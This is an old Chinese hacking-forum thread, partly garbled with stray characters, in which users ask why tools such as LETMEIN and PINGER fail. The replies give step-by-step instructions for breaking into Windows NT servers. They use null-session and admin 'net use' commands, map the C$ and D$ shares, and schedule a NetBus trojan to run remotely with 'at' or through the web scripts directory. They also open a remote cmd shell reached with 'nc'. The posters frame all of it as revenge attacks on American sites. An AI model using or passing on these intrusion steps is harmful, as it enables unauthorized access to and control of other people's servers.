《版主頁黑客工具和文章的幾個問題》中提到:
1 M7 g7 `$ \& q1 ~' k% ?請教,從版主頁上載得PINGER���,GRINDER�,LETMEIN等,卻不能用���,PINGER安裝后����,明明安裝前文件有1M多����,但安裝完后生成的文件夾中只有PINGER。EXE����,40多K,運行PINGER�����,設(shè)置好IP����,點PING,彈出一個窗口(C++�����。。���。)��,說出錯�����,然后關(guān)閉了,何故����,是不是安裝有誤? 2���。運行LETMEIN�����,彈出以下錯誤:連接文件LETMEIN���。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS��。 是否說明需要NETAPI32���。DLL文件�,哪里有該DLL���。 3�。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運行以下步驟等��,是否要求我的操作系統(tǒng)也是WINNT4���。0 ,應(yīng)該不是吧��? 4�����。NC FOR NT 是否要求我的操作系統(tǒng)為NT����,還是服務(wù)器的操作系統(tǒng)為NT��? 太多的問題需高手回答�,我花那么多的時間和金錢下載這幾M文件卻不能用�����,實在窩囊哦���, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章���,以提高我國黑客水平����。
3 \- A! d7 V" h, a> 我的機子MMX166,WIN98��,2�。5G,32M內(nèi)存�。
3 }- c/ `3 J4 Z9 G' {7 f: \0 ] v4 d, J [" Z
黑客并不神秘,你只要了解操作系統(tǒng)��,學(xué)習(xí)一些操作系統(tǒng)的弱點,輔助相關(guān)的工具�,就可以成功。7 f3 h1 v6 N) ^* y# O' }
你的問題是���,pinger, grinder, letmein等工具必須要在NT上運行���,我們強烈建議,你一定要安裝NT����,對于你的機器配制,和我們現(xiàn)在差不多�����,只是比你多了32M內(nèi)存���,2G硬盤����。
$ L+ q x; T4 o# Z* Q! f其實�����,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了���,比如����,我們在NT上攻擊某服務(wù)器�,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功���,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�,做法如下:
& z9 H4 E" H+ R( M) H) O% Unet use \\111.111.111.111\ipc$ "" /user:""
! Q- I3 ^4 t2 R |9 lnet.exe是NT的工具文件�����,該命令將和目標(biāo)服務(wù)器建立Null Session��,如果成功����,你可以查看該服務(wù)器上的共享目錄:7 x n: x" q _+ b8 J6 U
net view \\111.111.111.111
6 ?& I+ R r: Y+ e6 b2 \1 T當(dāng)然����,如果你有該NT管理員密碼���,就更好辦了,假設(shè)其管理員Admin密碼為fuck:9 [0 L% d7 S+ y& |; S
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
3 h, V% o/ q" |6 }& |, o5 T命令成功后�����,幾乎所有目標(biāo)NT上的配制�,資源,你都可以在你本地NT上連接遠(yuǎn)程計算機來查看或修改: I! l0 |2 A8 D: I6 _* E- p
1�、查看或修改遠(yuǎn)程機器上的硬盤,假如目標(biāo)NT上有C���、D兩個硬盤:
( g+ n% I6 I' N0 c/ }, @9 Nnet use x: \\111.111.111.111\c$
# L. p" _* x G0 \4 snet use y: \\111.111.111.111\d$
8 c& T r. ^# y) ]% C+ E這樣��,目標(biāo)NT上的C���、D盤分別被影射為你本地的X、Y盤���,你想怎么做都可以...
8 i# ^9 r9 m" k+ P2�、管理目標(biāo)NT的用戶:3 c* W5 H# d7 D+ f) k; \
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”2 z' C9 o* ^: I% W7 Z6 o
鍵入\\111.111.111.111后����,目標(biāo)NT上的所有用戶你想怎么做都可以����,和管理你本地的一樣; r. H' F# H/ B# w/ F
3��、管理目標(biāo)NT的服務(wù)
4 I6 r& o# l0 l5 Q/ L選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”: n' u$ Q4 x/ f
這樣你可以管理目標(biāo)NT上的服務(wù)�����,共享目錄) ^/ |$ G( \" i) {% C
4�、IIS管理. b- J. v: Y. y: z+ Q' T
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
! c* m/ w" O s/ S$ j1 g目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
6 t0 j* ]/ V! U+ [( u5�、事件管理
4 G( O7 J. `3 ?“事件查看器”->連接到服務(wù)器->111.111.111.111, T% Y+ X. J; p) c7 N# k6 U7 P
$ Q7 P9 w) h- U" f% A. [
還有更多的東西,都可以用NT本身的功能來完成�����,這些都是95, 98所不能實現(xiàn)的��。
& Z: [+ M! I1 o' ]& w3 q* K! B) d+ k
當(dāng)然���,98,95也能做一些事情�,但很麻煩��,比如:
! C9 m; z7 }, wnet use \\111.111.111.111\ipc$) x9 |* F9 g& c. g8 `
net use z: \\111.111.111.111\d$" C! p, f7 `# D8 a; o# ?" S
但其后不能帶參數(shù)����,即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄���,如果你知道目標(biāo)NT的用戶或密碼�,重新啟動95, 98����,改用該用戶和密碼登錄,方可實現(xiàn)�,你可以連接目標(biāo)NT上的共享資源,但不能進行管理��,如用戶�、事件等
7 y& b; P+ `* v8 |
3 ?' x# ]& [7 d/ N% K, j我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點�����,花點時間����,裝個NT吧,NT Workstation也可以!! \8 p% w) O/ T
這樣����,你還可以了解目標(biāo)機器上能有什么東東供你去用!
+ a* c0 S% w {" L! d) \/ W1 E2 }- a2 w$ m
% b7 q5 J" M$ j; X--------------------------------------------------------------------------------
6 b% v1 ?2 O2 N9 T* [, ?
5 Q, w9 q2 Z. f3 h>quack于1999-06-12��,23:37:44
3 F- T3 |: i0 A/ _& s$ m在大作《幾個有關(guān)黑的問題》中提到:
2 \* N7 M2 P1 k6 x" }) `首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!�����。
+ ^: }9 V" |( C) ~* q
7 i8 W( r. c0 B r ]3 @# Wkillusa于1999-06-13�,03:25:15
) `: k: k7 q/ @$ m( Y2 x. h在大作《Re: 幾個有關(guān)黑的問題》中提到:
/ C# n6 J G: y* A0 r4 Q& a1 K5 M' ?- L1 f) q L2 A
letmein.exe 暫時沒有mypwd參數(shù),十分抱歉2 l$ H; L. L2 y7 w# c( @4 F
pinger程序���,只是利用ping來尋找主機�,每臺NT服務(wù)器有一個主IP地址�����,但也可以設(shè)置多個輔助IP地址����,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個IP����,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址�����,所以有時顯示只有IP���,而無主機名����。另外�����,有些服務(wù)器是非NT的操作系統(tǒng)�,有時將不會顯示主機名。當(dāng)然�,有時在服務(wù)器上進行一些設(shè)置,也會出現(xiàn)上面的情況����。
8 q! `/ e1 W* \( [7 f5 x% p, k4 R) |! V" R# `' ^9 O
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以���,netbus.exe是不用上傳的��,只需在目的
8 z- N) b3 e0 d0 x3 Z0 j服務(wù)器上運行ntsrv.exe��,而在目的服務(wù)器運行該程序有很多種方法:; M1 F6 D, g1 g g+ v- P; _% m
2 Y$ P1 S$ i, x7 e% b, y: l1�����、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序���,具體使用方法�,可在自己的NT Dos窗口下鍵入以下:
: H9 J1 a- y' ?- v1 n5 {9 \5 e
3 O; I5 [' o" { aC:\>net start schedule
+ D+ S, f1 N! [: V% tSchedule 正在啟動服務(wù).....
7 u- [8 e# m. J& `5 }Schedulw 服務(wù)啟動成功����。
: b; {; I- m5 r8 V: n0 m$ D$ oC:\>at /?
! T3 ^. _) g7 _, q0 ~AT 命令排定在特定的日期和時間運行某些命令和程序。3 u+ f9 u: M% y
運行 AT 命令之前必須先啟動 Schedule 服務(wù)���。
& f- D% T+ P0 R! s; l3 }
8 ~; I. ?; L$ XAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]0 I3 e! ]* @. X3 M, {+ P8 N
AT [\\computername] time [/INTERACTIVE]" X% w! k4 V6 G Z5 ?3 {/ j4 {
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
$ w n: F6 v, H& y9 W1 l R8 N, I; f; X9 ]7 T+ _+ k8 G
\\computername 指定遠(yuǎn)程計算機�。 如果省略這個參數(shù)" \1 z( S: |4 A+ ? [
命令會被排定在本機上運行�。% o5 Y; O! o0 {& R; _9 n- G
id 指定給排定進度命令的識別號。' |. H: c' R+ [( r5 N/ K' Y
. |4 u5 s9 `: K: O, g
/delete 刪除某個已排定進度的命令����。如果省略標(biāo)識����,計算機上所有已排定進度的命令都會被刪除���。
9 g+ k* ^/ P' _9 y4 l/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認(rèn)信息 ����。; r- T2 p" [4 W: e) E0 n/ k/ f
time 指定命令運行的時間。4 t- ^9 w5 |) S& y
/interactive 允許作業(yè)在運行時��,與用戶通過桌面交互���。
2 \$ l2 o6 d; Q" u. y* [8 \7 }1 |; y2 | _ Z# I! l. w N
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令�����。$ B" N. `) j) Y
如果省略日期�����,則默認(rèn)為在每月的本日運行�。
4 O/ R$ k1 C& P7 d( U/ ?/ ^8 G) q/ A% W6 x4 I, f+ w. `) m: A% O. N
/next:date[,...] 指定在下一個指定日期 (如��,下周三),運行命令�����。如果省略日期�,則默認(rèn)為在每月的本日運行。2 w8 u8 e4 W" |/ E
+ a( D( S8 Z! R
"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件��。
/ Q \' n& E- K* P1 f# C
3 C7 d7 P% X) WC:\>2 n8 _# i$ L9 k2 V5 T
/ D/ x' c( N! w% i知道了如何使用AT����,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:
/ G3 m6 D0 q- O9 _1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
1 b% k7 P% k2 x' H r2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
* ]/ w* M2 [. M6 t) |% v3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行�,當(dāng)然最快運行最理想,所以�����,你可以用letmein.exe得到服務(wù)器的時間�,然后:" }! ]& @7 l: O; M) h( O3 U
at \\x.x.x.x 00:00 ntsrv.exe /port:64321* h# K& j O$ {0 O$ J
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后���,再在本地啟動netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname��,連接��!具體使用可參照 "How to get in nt"�����,比如第一種方法����,你想要在目的服務(wù)器運行 LEGION���,可以利用netbus得上傳功能�����,將LEGION上傳至目的服務(wù)器����,再用netbus的"Start program"���,鍵入完整路徑的LEGION運行程序�,就ok了!第二種方法是利用netbus的“App redirect”功能��,啟動遠(yuǎn)程telnet服務(wù)���,如下:在netbus中擊“App redirect”�,鍵入"C:\>winnt\system32\cmd.exe"����,Port為:4321,服務(wù)就啟動了�����,然后在本地運行:nc x.x.x.x 4321�����,出現(xiàn)dos啟動的畫面就表示連接成功:
) D7 P P( D2 V! c- \6 P. Y5 u; NMicrosoft(R) Windows NT(TM)( o$ Y7 D- x/ K3 M, h
(C) Copyright 1985-1996 Microsoft Corp.
' c% S! B0 y [C:\>
6 \8 H6 z& V2 K; v9 z% M8 \% }8 m5 R
2����、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
2 |' F% W5 e4 J5 y
: i% u4 b' N i- D% p7 w將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts�,然后在瀏覽器鍵入url如:
0 x4 @ M$ C2 K: zhttp://x.x.x.x/scripts/ntsrv.exe /port:64321' t1 `+ \0 a+ W" p# S1 r2 m1 I1 o, H/ F
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643217 D+ I# W- |! @2 h
該程序就啟動了; n7 q+ K+ j0 [! {* {1 W, k
z* f4 N: I' H, y; K$ M- X
我只提這幾中方法!3 p8 z/ }6 }, F. d
要成功����,必須打好基礎(chǔ)工����,對操作系統(tǒng)充分了解!
' b1 f! H6 P$ p2 I3 E i
a, v1 Q( r2 A, r2 K |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡